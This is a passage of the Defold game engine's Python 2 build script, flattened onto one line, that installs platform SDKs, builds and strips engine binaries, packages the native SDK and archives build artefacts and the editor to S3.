PACKAGES_XCODE_TOOLCHAIN)) if self.target_platform in ('armv7-darwin', 'arm64-darwin', 'x86_64-ios'): folders.append(join(sdkfolder, PACKAGES_IOS_SDK)) folders.append(join(sdkfolder, PACKAGES_IOS_SIMULATOR_SDK)) if self.target_platform in ('x86_64-win32', 'win32'): folders.append(join(sdkfolder, 'Win32','WindowsKits','10')) folders.append(join(sdkfolder, 'Win32','MicrosoftVisualStudio14.0','VC')) if self.target_platform in ('armv7-android', 'arm64-android'): folders.append(join(sdkfolder, PACKAGES_ANDROID_NDK)) folders.append(join(sdkfolder, PACKAGES_ANDROID_SDK)) for f in folders: if not os.path.exists(f): print "Missing SDK in", f print "Run './scripts/build.py install_ext --platform=%s'" % self.target_platform sys.exit(1) def install_sdk(self): sdkfolder = join(self.ext, 'SDKs') target_platform = self.target_platform if target_platform in ('x86_64-darwin', 'armv7-darwin', 'arm64-darwin', 'x86_64-ios'): # macOS SDK download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_MACOS_SDK), join(sdkfolder, PACKAGES_MACOS_SDK)) download_sdk(self,'%s/%s.darwin.tar.gz' % (self.package_path, PACKAGES_XCODE_TOOLCHAIN), join(sdkfolder, PACKAGES_XCODE_TOOLCHAIN)) if target_platform in ('armv7-darwin', 'arm64-darwin', 'x86_64-ios'): # iOS SDK download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_IOS_SDK), join(sdkfolder, PACKAGES_IOS_SDK)) download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_IOS_SIMULATOR_SDK), join(sdkfolder, PACKAGES_IOS_SIMULATOR_SDK)) if 'win32' in target_platform or ('win32' in self.host2): win32_sdk_folder = join(self.ext, 'SDKs', 'Win32') download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_WIN32_SDK_10), join(win32_sdk_folder, 'WindowsKits', '10') ) download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_WIN32_TOOLCHAIN), join(win32_sdk_folder, 'MicrosoftVisualStudio14.0'), strip_components=0 ) # On OSX, the file system is already case insensitive, so no need to duplicate the files as we do on the extender server if target_platform in ('armv7-android', 'arm64-android'): host = self.host if 'win32' in host: host = 'windows' elif 'linux' in host: host = 'linux' # Android NDK download_sdk(self, '%s/%s-%s-x86_64.tar.gz' % (self.package_path, PACKAGES_ANDROID_NDK, host), join(sdkfolder, PACKAGES_ANDROID_NDK)) # Android SDK download_sdk(self, '%s/%s-%s-android-29-29.0.3.tar.gz' % (self.package_path, PACKAGES_ANDROID_SDK, host), join(sdkfolder, PACKAGES_ANDROID_SDK)) if 'linux' in self.host2: download_sdk(self, '%s/%s.tar.xz' % (self.package_path, PACKAGES_LINUX_TOOLCHAIN), join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG), format='J') if target_platform in ('x86_64-darwin', 'armv7-darwin', 'arm64-darwin', 'x86_64-ios') and 'linux' in self.host2: if not os.path.exists(join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG, 'cctools')): download_sdk(self, '%s/%s.tar.gz' % (self.package_path, PACKAGES_CCTOOLS_PORT), join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG), force_extract=True) build_private.install_sdk(self, target_platform) def get_ems_dir(self): return join(self.ext, 'SDKs', 'emsdk-' + EMSCRIPTEN_VERSION_STR) def _form_ems_path(self): upstream = join(self.get_ems_dir(), 'upstream', 'emscripten') if os.path.exists(upstream): return upstream return join(self.get_ems_dir(), 'fastcomp', 'emscripten') def install_ems(self): # TODO: should eventually be moved to install_sdk emsDir = self.get_ems_dir() os.environ['EMSCRIPTEN'] = self._form_ems_path() os.environ['EM_CONFIG'] = join(self.get_ems_dir(), '.emscripten') os.environ['EM_CACHE'] = join(self.get_ems_dir(), 'emscripten_cache') if os.path.isdir(emsDir): print "Emscripten is already installed:", emsDir else: self._check_package_path() platform_map = {'x86_64-linux':'linux','x86_64-darwin':'darwin','x86_64-win32':'win32'} path = join(self.package_path, '%s-%s.tar.gz' % (PACKAGES_EMSCRIPTEN_SDK, platform_map.get(self.host, self.host))) path = self.get_local_or_remote_file(path) self._extract(path, join(self.ext, 'SDKs')) config = os.environ['EM_CONFIG'] if not os.path.isfile(config): self.activate_ems() def activate_ems(self): version = EMSCRIPTEN_VERSION_STR if 'fastcomp' in self._form_ems_path(): version += "-fastcomp" run.env_command(self._form_env(), [join(self.get_ems_dir(), 'emsdk'), 'activate', version, '--embedded']) # prewarm the cache # Although this method might be more "correct", it also takes 10 minutes more than we'd like on CI #run.env_command(self._form_env(), ['%s/embuilder.py' % self._form_ems_path(), 'build', 'SYSTEM', 'MINIMAL']) # .. so we stick with the old version of prewarming # Compile a file warm up the emscripten caches (libc etc) c_file = tempfile.mktemp(suffix='.c') exe_file = tempfile.mktemp(suffix='.js') with open(c_file, 'w') as f: f.write('int main() { return 0; }') run.env_command(self._form_env(), ['%s/emcc' % self._form_ems_path(), c_file, '-o', '%s' % exe_file]) def check_ems(self): config = join(self.get_ems_dir(), '.emscripten') err = False if not os.path.isfile(config): print 'No .emscripten file.' err = True emsDir = self.get_ems_dir() if not os.path.isdir(emsDir): print 'Emscripten tools not installed.' err = True if err: print 'Consider running install_ems' def _git_sha1(self, ref = None): return self.build_utility.git_sha1(ref) def _ziptree(self, path, outfile = None, directory = None): # Directory is similar to -C in tar if not outfile: outfile = tempfile.NamedTemporaryFile(delete = False) zip = zipfile.ZipFile(outfile, 'w', zipfile.ZIP_DEFLATED) for root, dirs, files in os.walk(path): for f in files: p = os.path.join(root, f) an = p if directory: an = os.path.relpath(p, directory) zip.write(p, an) zip.close() return outfile.name def _add_files_to_zip(self, zip, paths, directory=None, topfolder=None): for p in paths: if not os.path.isfile(p): continue an = p if directory: an = os.path.relpath(p, directory) if topfolder: an = os.path.join(topfolder, an) zip.write(p, an) def is_cross_platform(self): return self.host != self.target_platform def is_desktop_target(self): return self.target_platform in ['x86_64-linux', 'x86_64-darwin', 'x86_64-win32'] # package the native SDK, return the path to the zip file def _package_platform_sdk(self, platform): with open(join(self.dynamo_home, 'defoldsdk.zip'), 'wb') as outfile: zip = zipfile.ZipFile(outfile, 'w', zipfile.ZIP_DEFLATED) topfolder = 'defoldsdk' defold_home = os.path.normpath(os.path.join(self.dynamo_home, '..', '..')) # Includes includes = [] cwd = os.getcwd() os.chdir(self.dynamo_home) for root, dirs, files in os.walk("sdk/include"): for file in files: if file.endswith('.h'): includes.append(os.path.join(root, file)) os.chdir(cwd) includes = [os.path.join(self.dynamo_home, x) for x in includes] self._add_files_to_zip(zip, includes, os.path.join(self.dynamo_home, 'sdk'), topfolder) # Configs configs = ['extender/build.yml'] configs = [os.path.join(self.dynamo_home, x) for x in configs] self._add_files_to_zip(zip, configs, self.dynamo_home, topfolder) # Variants variants = [] cwd = os.getcwd() os.chdir(self.dynamo_home) for root, dirs, files in os.walk("extender/variants"): for file in files: if file.endswith('.appmanifest'): variants.append(os.path.join(root, file)) os.chdir(cwd) variants = [os.path.join(self.dynamo_home, x) for x in variants] self._add_files_to_zip(zip, variants, self.dynamo_home, topfolder) def _findlibs(libdir): paths = os.listdir(libdir) paths = [os.path.join(libdir, x) for x in paths if os.path.splitext(x)[1] in ('.a', '.dylib', '.so', '.lib', '.dll')] return paths def _findjars(jardir, ends_with): paths = os.listdir(jardir) paths = [os.path.join(jardir, x) for x in paths if x.endswith(ends_with)] return paths def _findjslibs(libdir): paths = os.listdir(libdir) paths = [os.path.join(libdir, x) for x in paths if os.path.splitext(x)[1] in ('.js',)] return paths # Dynamo libs libdir = os.path.join(self.dynamo_home, 'lib/%s' % platform) paths = _findlibs(libdir) self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder) # External libs libdir = os.path.join(self.dynamo_home, 'ext/lib/%s' % platform) paths = _findlibs(libdir) self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder) # Android Jars (Dynamo) jardir = os.path.join(self.dynamo_home, 'share/java') paths = _findjars(jardir, ('android.jar', 'dlib.jar', 'r.jar')) self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder) # Android Jars (external) external_jars = ("android-support-multidex.jar", "android.jar") jardir = os.path.join(self.dynamo_home, 'ext/share/java') paths = _findjars(jardir, external_jars) self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder) # Win32 resource files engine_rc = os.path.join(self.dynamo_home, 'lib/%s/defold.ico' % platform) defold_ico = os.path.join(self.dynamo_home, 'lib/%s/engine.rc' % platform) self._add_files_to_zip(zip, [engine_rc, defold_ico], self.dynamo_home, topfolder) # JavaScript files # js-web-pre-x files jsdir = os.path.join(self.dynamo_home, 'share') paths = _findjslibs(jsdir) self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder) # libraries for js-web jsdir = os.path.join(self.dynamo_home, 'lib/js-web/js/') paths = _findjslibs(jsdir) self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder) # libraries for wasm-web jsdir = os.path.join(self.dynamo_home, 'lib/wasm-web/js/') paths = _findjslibs(jsdir) self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder) # For logging, print all paths in zip: for x in zip.namelist(): print(x) zip.close() return outfile.name return None def build_platform_sdk(self): # Helper function to make it easier to build a platform sdk locally try: path = self._package_platform_sdk(self.target_platform) except Exception, e: print "Failed to package sdk for platform %s: %s" % (self.target_platform, e) else: print "Wrote %s" % path def build_builtins(self): with open(join(self.dynamo_home, 'share', 'builtins.zip'), 'wb') as f: self._ziptree(join(self.dynamo_home, 'content', 'builtins'), outfile = f, directory = join(self.dynamo_home, 'content')) def _strip_engine(self, path): """ Strips the debug symbols from an executable """ if self.target_platform not in ['x86_64-linux','x86_64-darwin','armv7-darwin','arm64-darwin','x86_64-ios','armv7-android','arm64-android']: return False sdkfolder = join(self.ext, 'SDKs') strip = "strip" if 'android' in self.target_platform: ANDROID_NDK_VERSION = '20' ANDROID_NDK_ROOT = os.path.join(sdkfolder,'android-ndk-r%s' % ANDROID_NDK_VERSION) ANDROID_GCC_VERSION = '4.9' if target_platform == 'armv7-android': ANDROID_PLATFORM = 'arm-linux-androideabi' elif target_platform == 'arm64-android': ANDROID_PLATFORM = 'aarch64-linux-android' ANDROID_HOST = 'linux' if sys.platform == 'linux2' else 'darwin' strip = "%s/toolchains/%s-%s/prebuilt/%s-x86_64/bin/%s-strip" % (ANDROID_NDK_ROOT, ANDROID_PLATFORM, ANDROID_GCC_VERSION, ANDROID_HOST, ANDROID_PLATFORM) if self.target_platform in ('x86_64-darwin','armv7-darwin','arm64-darwin','x86_64-ios') and 'linux2' == sys.platform: strip = os.path.join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG, 'bin', 'x86_64-apple-darwin19-strip') run.shell_command("%s %s" % (strip, path)) return True def archive_engine(self): sha1 = self._git_sha1() full_archive_path = join(sha1, 'engine', self.target_platform).replace('\\', '/') share_archive_path = join(sha1, 'engine', 'share').replace('\\', '/') java_archive_path = join(sha1, 'engine', 'share', 'java').replace('\\', '/') dynamo_home = self.dynamo_home self.full_archive_path = full_archive_path bin_dir = self.build_utility.get_binary_path() lib_dir = self.target_platform # upload editor 2.0 launcher if self.target_platform in ['x86_64-linux', 'x86_64-darwin', 'x86_64-win32']: launcher_name = format_exes("launcher", self.target_platform)[0] launcherbin = join(bin_dir, launcher_name) self.upload_to_archive(launcherbin, '%s/%s' % (full_archive_path, launcher_name)) # upload gdc tool on desktop platforms if self.target_platform in ['x86_64-linux', 'x86_64-darwin', 'x86_64-win32']: gdc_name = format_exes("gdc", self.target_platform)[0] gdc_bin = join(bin_dir, gdc_name) self.upload_to_archive(gdc_bin, '%s/%s' % (full_archive_path, gdc_name)) for n in ['dmengine', 'dmengine_release', 'dmengine_headless']: for engine_name in format_exes(n, self.target_platform): engine = join(bin_dir, engine_name) self.upload_to_archive(engine, '%s/%s' % (full_archive_path, engine_name)) engine_stripped = join(bin_dir, engine_name + "_stripped") shutil.copy2(engine, engine_stripped) if self._strip_engine(engine_stripped): self.upload_to_archive(engine_stripped, '%s/stripped/%s' % (full_archive_path, engine_name)) if 'win32' in self.target_platform: pdb = join(bin_dir, os.path.splitext(engine_name)[0] + '.pdb') self.upload_to_archive(pdb, '%s/%s' % (full_archive_path, os.path.basename(pdb))) if 'web' in self.target_platform: engine_mem = join(bin_dir, engine_name + '.mem') if os.path.exists(engine_mem): self.upload_to_archive(engine_mem, '%s/%s.mem' % (full_archive_path, engine_name)) engine_symbols = join(bin_dir, engine_name + '.symbols') if os.path.exists(engine_symbols): self.upload_to_archive(engine_symbols, '%s/%s.symbols' % (full_archive_path, engine_name)) elif 'darwin' in self.target_platform: engine_symbols = join(bin_dir, engine_name + '.dSYM.zip') if os.path.exists(engine_symbols): self.upload_to_archive(engine_symbols, '%s/%s' % (full_archive_path, os.path.basename(engine_symbols))) zip_archs = [] if not self.skip_docs: zip_archs.append('ref-doc.zip') if not self.skip_builtins: zip_archs.append('builtins.zip') for zip_arch in zip_archs: self.upload_to_archive(join(dynamo_home, 'share', zip_arch), '%s/%s' % (share_archive_path, zip_arch)) if self.target_platform == 'x86_64-linux': # NOTE: It's arbitrary for which platform we archive dlib.jar. Currently set to linux 64-bit self.upload_to_archive(join(dynamo_home, 'share', 'java', 'dlib.jar'), '%s/dlib.jar' % (java_archive_path)) if 'android' in self.target_platform: files = [ ('share/java', 'classes.dex'), ('bin/%s' % (self.target_platform), 'dmengine.apk'), ('ext/share/java', 'android.jar'), ] for f in files: src = join(dynamo_home, f[0], f[1]) self.upload_to_archive(src, '%s/%s' % (full_archive_path, f[1])) resources = self._ziptree(join(dynamo_home, 'ext', 'share', 'java', 'res'), directory = join(dynamo_home, 'ext', 'share', 'java')) self.upload_to_archive(resources, '%s/android-resources.zip' % (full_archive_path)) if self.is_desktop_target(): libs = ['texc', 'particle'] for lib in libs: lib_name = format_lib('%s_shared' % (lib), self.target_platform) lib_path = join(dynamo_home, 'lib', lib_dir, lib_name) self.upload_to_archive(lib_path, '%s/%s' % (full_archive_path, lib_name)) sdkpath = self._package_platform_sdk(self.target_platform) self.upload_to_archive(sdkpath, '%s/defoldsdk.zip' % full_archive_path) def _get_build_flags(self): supported_tests = {} supported_tests['darwin'] = ['darwin', 'x86_64-darwin'] supported_tests['x86_64-win32'] = ['win32', 'x86_64-win32', 'arm64-nx64'] supports_tests = self.target_platform in supported_tests.get(self.host, []) or self.host == self.target_platform skip_tests = '--skip-tests' if self.skip_tests or not supports_tests else '' skip_codesign = '--skip-codesign' if self.skip_codesign else '' disable_ccache = '--disable-ccache' if self.disable_ccache else '' return {'skip_tests':skip_tests, 'skip_codesign':skip_codesign, 'disable_ccache':disable_ccache, 'prefix':None} def get_base_platforms(self): # Base platforms is the platforms to build the base libs for. # The base libs are the libs needed to build bob, i.e. contains compiler code. platform_dependencies = {'darwin': ['darwin', 'x86_64-darwin'], # x86_64-darwin from IOS fix 3dea8222 'x86_64-linux': [], 'x86_64-win32': ['win32']} platforms = list(platform_dependencies.get(self.host, [self.host])) if not self.host in platforms: platforms.append(self.host) return platforms def _build_engine_cmd(self, skip_tests, skip_codesign, disable_ccache, prefix): prefix = prefix and prefix or self.dynamo_home return 'python %s/ext/bin/waf --prefix=%s %s %s %s distclean configure build install' % (self.dynamo_home, prefix, skip_tests, skip_codesign, disable_ccache) def _build_engine_lib(self, args, lib, platform, skip_tests = False, dir = 'engine'): self._log('Building %s for %s' % (lib, platform)) skip_build_tests = [] if skip_tests and '--skip-build-tests' not in self.waf_options: skip_build_tests.append('--skip-tests') skip_build_tests.append('--skip-build-tests') cwd = join(self.defold_root, '%s/%s' % (dir, lib)) plf_args = ['--platform=%s' % platform] run.env_command(self._form_env(), args + plf_args + self.waf_options + skip_build_tests, cwd = cwd) def build_bob_light(self): self._log('Building bob light') cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob') sha1 = self._git_sha1() if os.path.exists(os.path.join(self.dynamo_home, 'archive', sha1)): run.env_shell_command(self._form_env(), "./scripts/copy.sh", cwd = cwd) env = self._form_env() ant_args = ['-logger', 'org.apache.tools.ant.listener.AnsiColorLogger'] env['ANT_OPTS'] = '-Dant.logger.defaults=%s/ant-logger-colors.txt' % join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test') run.command(" ".join([join(self.dynamo_home, 'ext/share/ant/bin/ant'), 'clean', 'install-bob-light'] + ant_args), cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob'), shell = True, env = env) def build_engine(self): self.check_sdk() # We want random folder to thoroughly test bob-light # We dont' want it to unpack for _every_ single invocation during the build os.environ['DM_BOB_ROOTFOLDER'] = tempfile.mkdtemp(prefix='bob-light-') self._log("env DM_BOB_ROOTFOLDER=" + os.environ['DM_BOB_ROOTFOLDER']) cmd = self._build_engine_cmd(**self._get_build_flags()) args = cmd.split() host = self.host2 if 'x86-' in host: host = self.host if host == 'darwin': host = 'x86_64-darwin' # Make sure we build these for the host platform for the toolchain (bob light) for lib in ['dlib', 'texc']: skip_tests = host != self.target_platform self._build_engine_lib(args, lib, host, skip_tests = skip_tests) if not self.skip_bob_light: # We must build bob-light, which builds content during the engine build self.build_bob_light() # Target libs to build engine_libs = list(ENGINE_LIBS) if host != self.target_platform: engine_libs.insert(0, 'dlib') if self.is_desktop_target(): engine_libs.insert(1, 'texc') for lib in engine_libs: if not build_private.is_library_supported(target_platform, lib): continue self._build_engine_lib(args, lib, target_platform) self._build_engine_lib(args, 'extender', target_platform, dir = 'share') if not self.skip_docs: self.build_docs() if not self.skip_builtins: self.build_builtins() if '--static-analyze' in self.waf_options: scan_output_dir = os.path.normpath(os.path.join(os.environ['DYNAMO_HOME'], '..', '..', 'static_analyze')) report_dir = os.path.normpath(os.path.join(os.environ['DYNAMO_HOME'], '..', '..', 'report')) run.command(['python', './scripts/scan_build_gather_report.py', '-o', report_dir, '-i', scan_output_dir]) print("Wrote report to %s. Open with 'scan-view .' or 'python -m SimpleHTTPServer'" % report_dir) shutil.rmtree(scan_output_dir) if os.path.exists(os.environ['DM_BOB_ROOTFOLDER']): print "Removing", os.environ['DM_BOB_ROOTFOLDER'] shutil.rmtree(os.environ['DM_BOB_ROOTFOLDER']) def build_external(self): flags = self._get_build_flags() flags['prefix'] = join(self.defold_root, 'packages') cmd = self._build_engine_cmd(**flags) args = cmd.split() + ['package'] for lib in EXTERNAL_LIBS: self._build_engine_lib(args, lib, platform=self.target_platform, dir='external') def build_go(self): exe_ext = '.exe' if 'win32' in self.target_platform else '' go = '%s/ext/go/%s/go/bin/go%s' % (self.dynamo_home, self.target_platform, exe_ext) if not os.path.exists(go): self._log("Missing go for target platform, run install_ext with --platform set.") exit(5) run.env_command(self._form_env(), [go, 'clean', '-i', 'github.com/...']) run.env_command(self._form_env(), [go, 'install', 'github.com/...']) run.env_command(self._form_env(), [go, 'clean', '-i', 'defold/...']) if not self.skip_tests: run.env_command(self._form_env(), [go, 'test', 'defold/...']) run.env_command(self._form_env(), [go, 'install', 'defold/...']) for f in glob(join(self.defold, 'go', 'bin', '*')): shutil.copy(f, join(self.dynamo_home, 'bin')) def archive_go(self): sha1 = self._git_sha1() full_archive_path = join(sha1, 'go', self.target_platform) for p in glob(join(self.defold, 'go', 'bin', '*')): self.upload_to_archive(p, '%s/%s' % (full_archive_path, basename(p))) def archive_bob(self): sha1 = self._git_sha1() full_archive_path = join(sha1, 'bob').replace('\\', '/') for p in glob(join(self.dynamo_home, 'share', 'java', 'bob.jar')): self.upload_to_archive(p, '%s/%s' % (full_archive_path, basename(p))) def copy_local_bob_artefacts(self): apkc_name = format_exes('apkc', self.host2)[0] texc_name = format_lib('texc_shared', self.host2) luajit_dir = tempfile.mkdtemp() cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob') missing = {} def add_missing(plf, txt): txts = [] txts = missing.setdefault(plf, txts) txts = txts.append(txt) for plf in [['x86_64-win32', 'x86_64-win32'], ['x86_64-linux', 'x86_64-linux'], ['x86_64-darwin', 'x86_64-darwin']]: luajit_path = join(cwd, '../../packages/luajit-2.1.0-beta3-%s.tar.gz' % (plf[0])) if not os.path.exists(luajit_path): add_missing(plf[1], "package '%s' could not be found" % (luajit_path)) else: self._extract(luajit_path, luajit_dir) luajit_exe = format_exes('luajit-32', plf[1])[0] luajit_exe_64 = format_exes('luajit-64', plf[1])[0] self._copy(join(luajit_dir, 'bin/%s/%s' % (plf[0], luajit_exe)), join(cwd, 'libexec/%s/%s' % (plf[1], luajit_exe))) self._copy(join(luajit_dir, 'bin/%s/%s' % (plf[0], luajit_exe_64)), join(cwd, 'libexec/%s/%s' % (plf[1], luajit_exe_64))) win32_files = dict([['ext/lib/%s/%s.dll' % (plf[0], lib), 'lib/%s/%s.dll' % (plf[1], lib)] for lib in ['OpenAL32', 'wrap_oal', 'PVRTexLib', 'msvcr120'] for plf in [['win32', 'x86-win32'], ['x86_64-win32', 'x86_64-win32']]]) osx_files = dict([['ext/lib/%s/lib%s.dylib' % (plf[0], lib), 'lib/%s/lib%s.dylib' % (plf[1], lib)] for lib in ['PVRTexLib'] for plf in [['x86_64-darwin', 'x86_64-darwin']]]) linux_files = dict([['ext/lib/%s/lib%s.so' % (plf[0], lib), 'lib/%s/lib%s.so' % (plf[1], lib)] for lib in ['PVRTexLib'] for plf in [['x86_64-linux', 'x86_64-linux']]]) js_files = {} android_files = {'ext/bin/%s/%s' % (self.host2, apkc_name): 'libexec/%s/%s' % (self.host2, apkc_name), 'share/java/classes.dex': 'lib/classes.dex', 'ext/share/java/android.jar': 'lib/android.jar'} switch_files = {} # This dict is being built up and will eventually be used for copying in the end # - "type" - what the files are needed for, for error reporting # - pairs of src-file -> dst-file artefacts = {'generic': {'share/java/dlib.jar': 'lib/dlib.jar', 'share/builtins.zip': 'lib/builtins.zip', 'lib/%s/%s' % (self.host2, texc_name): 'lib/%s/%s' % (self.host2, texc_name)}, 'android-bundling': android_files, 'win32-bundling': win32_files, 'js-bundling': js_files, 'ios-bundling': {}, 'osx-bundling': osx_files, 'linux-bundling': linux_files, 'switch-bundling': switch_files} # Add dmengine to 'artefacts' procedurally for type, plfs in {'android-bundling': [['armv7-android', 'armv7-android'], ['arm64-android', 'arm64-android']], 'win32-bundling': [['win32', 'x86-win32'], ['x86_64-win32', 'x86_64-win32']], 'js-bundling': [['js-web', 'js-web'], ['wasm-web', 'wasm-web']], 'ios-bundling': [['armv7-darwin', 'armv7-darwin'], ['arm64-darwin', 'arm64-darwin'], ['x86_64-ios', 'x86_64-ios']], 'osx-bundling': [['x86_64-darwin', 'x86_64-darwin']], 'linux-bundling': [['x86_64-linux', 'x86_64-linux']], 'switch-bundling': [['arm64-nx64', 'arm64-nx64']]}.iteritems(): # plfs is pairs of src-platform -> dst-platform for plf in plfs: exes = format_exes('dmengine', plf[1]) + format_exes('dmengine_release', plf[1]) artefacts[type].update(dict([['bin/%s/%s' % (plf[0], exe), 'libexec/%s/%s' % (plf[1], exe)] for exe in exes])) # Perform the actual copy, or list which files are missing for type, files in artefacts.iteritems(): m = [] for src, dst in files.iteritems(): src_path = join(self.dynamo_home, src) if not os.path.exists(src_path): m.append(src_path) else: dst_path = join(cwd, dst) self._mkdirs(os.path.dirname(dst_path)) self._copy(src_path, dst_path) if m: add_missing(type, m) if missing: print('*** NOTE! There are missing artefacts.') print(json.dumps(missing, indent=2)) def build_bob(self): cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob') sha1 = self._git_sha1() if os.path.exists(os.path.join(self.dynamo_home, 'archive', sha1)): run.env_shell_command(self._form_env(), "./scripts/copy.sh", cwd = cwd) else: self.copy_local_bob_artefacts() env = self._form_env() ant = join(self.dynamo_home, 'ext/share/ant/bin/ant') ant_args = ['-logger', 'org.apache.tools.ant.listener.AnsiColorLogger'] env['ANT_OPTS'] = '-Dant.logger.defaults=%s/ant-logger-colors.txt' % join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test') cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob') args = [ant, 'clean', 'install'] + ant_args run.command(" ".join(args), cwd = cwd, shell = True, env = env, stdout = None) if not self.skip_tests: cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test') args = [ant, 'test-clean', 'test'] + ant_args run.command(" ".join(args), cwd = cwd, shell = True, env = env, stdout = None) def build_sdk(self): tempdir = tempfile.mkdtemp() # where the sdk ends up sha1 = self._git_sha1() u = urlparse.urlparse(self.get_archive_path()) bucket = s3.get_bucket(u.netloc) root = urlparse.urlparse(self.get_archive_path()).path[1:] base_prefix = os.path.join(root, sha1) platforms = get_target_platforms() for platform in platforms: prefix = os.path.join(base_prefix, 'engine', platform, 'defoldsdk.zip') entry = bucket.get_key(prefix) if entry is None: raise Exception("Could not find sdk: %s" % prefix) platform_sdk_zip = tempfile.NamedTemporaryFile(delete = False) print "Downloading", entry.key entry.get_contents_to_filename(platform_sdk_zip.name) print "Downloaded", entry.key, "to", platform_sdk_zip.name self._extract_zip(platform_sdk_zip.name, tempdir) print "Extracted", platform_sdk_zip.name, "to", tempdir os.unlink(platform_sdk_zip.name) print "" treepath = os.path.join(tempdir, 'defoldsdk') sdkpath = self._ziptree(treepath, directory=tempdir) print "Packaged defold sdk" sdkurl = join(sha1, 'engine').replace('\\', '/') self.upload_to_archive(sdkpath, '%s/defoldsdk.zip' % sdkurl) def build_docs(self): skip_tests = '--skip-tests' if self.skip_tests or self.target_platform != self.host else '' self._log('Building API docs') cwd = join(self.defold_root, 'engine/docs') cmd = 'python %s/ext/bin/waf configure --prefix=%s %s distclean configure build install' % (self.dynamo_home, self.dynamo_home, skip_tests) run.env_command(self._form_env(), cmd.split() + self.waf_options, cwd = cwd) with open(join(self.dynamo_home, 'share', 'ref-doc.zip'), 'wb') as f: self._ziptree(join(self.dynamo_home, 'share', 'doc'), outfile = f, directory = join(self.dynamo_home, 'share')) # ------------------------------------------------------------ # BEGIN: EDITOR 2 # def download_editor2(self): if not self.channel: raise Exception('No channel provided when downloading the editor') editor_filename = "Defold-%s.zip" % self.target_platform editor_path = join(self.defold_root, 'editor', 'target', 'editor', editor_filename) s3_path = join(self._git_sha1(), self.channel, 'editor2', editor_filename) self.download_from_archive(s3_path, editor_path) def archive_editor2(self): if not self.channel: raise Exception('No channel provided when archiving the editor') sha1 = self._git_sha1() full_archive_path = join(sha1, self.channel, 'editor2') zip_file = "Defold-%s.zip" % self.target_platform dmg_file = "Defold-%s.dmg" % self.target_platform zip_path = join(self.defold_root, 'editor', 'target', 'editor', zip_file) dmg_path = join(self.defold_root, 'editor', 'target', 'editor', dmg_file) if os.path.exists(zip_path): self.upload_to_archive(zip_path, '%s/%s' % (full_archive_path, zip_file)) if os.path.exists(dmg_path): self.upload_to_archive(dmg_path, '%s/%s' % (full_archive_path, dmg_file)) self.wait_uploads() def run_editor_script(self, cmd): cwd = join(self.defold_root, 'editor') run.env_command(self._form_env(), cmd, cwd = cwd) def build_editor2(self): cmd = ['python', './scripts/bundle.py', '--engine-artifacts=%s' % self.engine_artifacts, 'build'] if self.skip_tests: cmd.append("--skip-tests") self.run_editor_script(cmd) def bundle_editor2(self): if not self.channel: raise Exception('No channel provided when bundling the editor') cmd = ['python', './scripts/bundle.py', '--platform=%s' % self.target_platform, '--version=%s' % self.version, '--channel=%s' % self.channel, '--engine-artifacts=%s' % self.engine_artifacts, 'bundle'] self.run_editor_script(cmd) def sign_editor2(self): editor_bundle_dir = join(self.defold_root, 'editor', 'target', 'editor') cmd = ['python', './scripts/bundle.py', '--platform=%s' % self.target_platform, '--bundle-dir=%s' % editor_bundle_dir, 'sign'] if self.skip_codesign: cmd.append('--skip-codesign') else: if self.windows_cert: cmd.append('--windows-cert=%s' % self.windows_cert) if self.windows_cert_pass: cmd.append("--windows-cert-pass=%s" % self.windows_cert_pass) if self.codesigning_identity: cmd.append('--codesigning-identity="%s"' % self.codesigning_identity) self.run_editor_script(cmd) def notarize_editor2(self): if self.target_platform != "x86_64-darwin": return editor_bundle_dir = join(self.defold_root, 'editor', 'target', 'editor') # create dmg installer cmd = ['./scripts/bundle.py', '--platform=x86_64-darwin', '--bundle-dir=%s' % editor_bundle_dir, 'installer'] if self.skip_codesign: cmd.append('--skip-codesign') else: if self.codesigning_identity: cmd.append('--codesigning-identity="%s"' % self.codesigning_identity) self.run_editor_script(cmd) # notarize dmg editor_dmg = join(editor_bundle_dir, 'Defold-x86_64-darwin.dmg') cmd = ['./scripts/notarize.py', editor_dmg, self.notarization_username, self.notarization_password, self.notarization_itc_provider] self.run_editor_script(cmd) # # END: EDITOR 2 # ------------------------------------------------------------ def bump(self): sha1 = self._git_sha1() with open('VERSION', 'r') as f: current = f.readlines()[0].strip() if self.set_version: new_version = self.set_version else: lst = map(int, current.split('.')) lst[-1] += 1 new_version = '.'.join(map(str, lst)) with open('VERSION', 'w') as f: f.write(new_version) print 'Bumping engine version from %s to %s' % (current, new_version) print 'Review changes and commit' def save_env(self): if not self.save_env_path: self._log("No --save-env-path set when trying to save environment export") return env = self._form_env() res = "" for key in env: if bool(re.match('^[a-zA-Z0-9_]+$', key)): res = res + ("export %s='%s'\n" % (key, env[key])) with open(self.save_env_path, "w") as f: f.write(res) def shell(self): print 'Setting up shell with DYNAMO_HOME, PATH, ANDROID_HOME and LD_LIBRARY_PATH/DYLD_LIBRARY_PATH (where applicable) set' if "win32" in self.host: preexec_fn = None else: preexec_fn = self.check_ems process = subprocess.Popen([SHELL, '-l'], env = self._form_env(), preexec_fn=preexec_fn) output = process.communicate()[0] if process.returncode != 0: self._log(output) sys.exit(process.returncode) # ------------------------------------------------------------ # BEGIN: RELEASE # def release(self): page = """ <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta 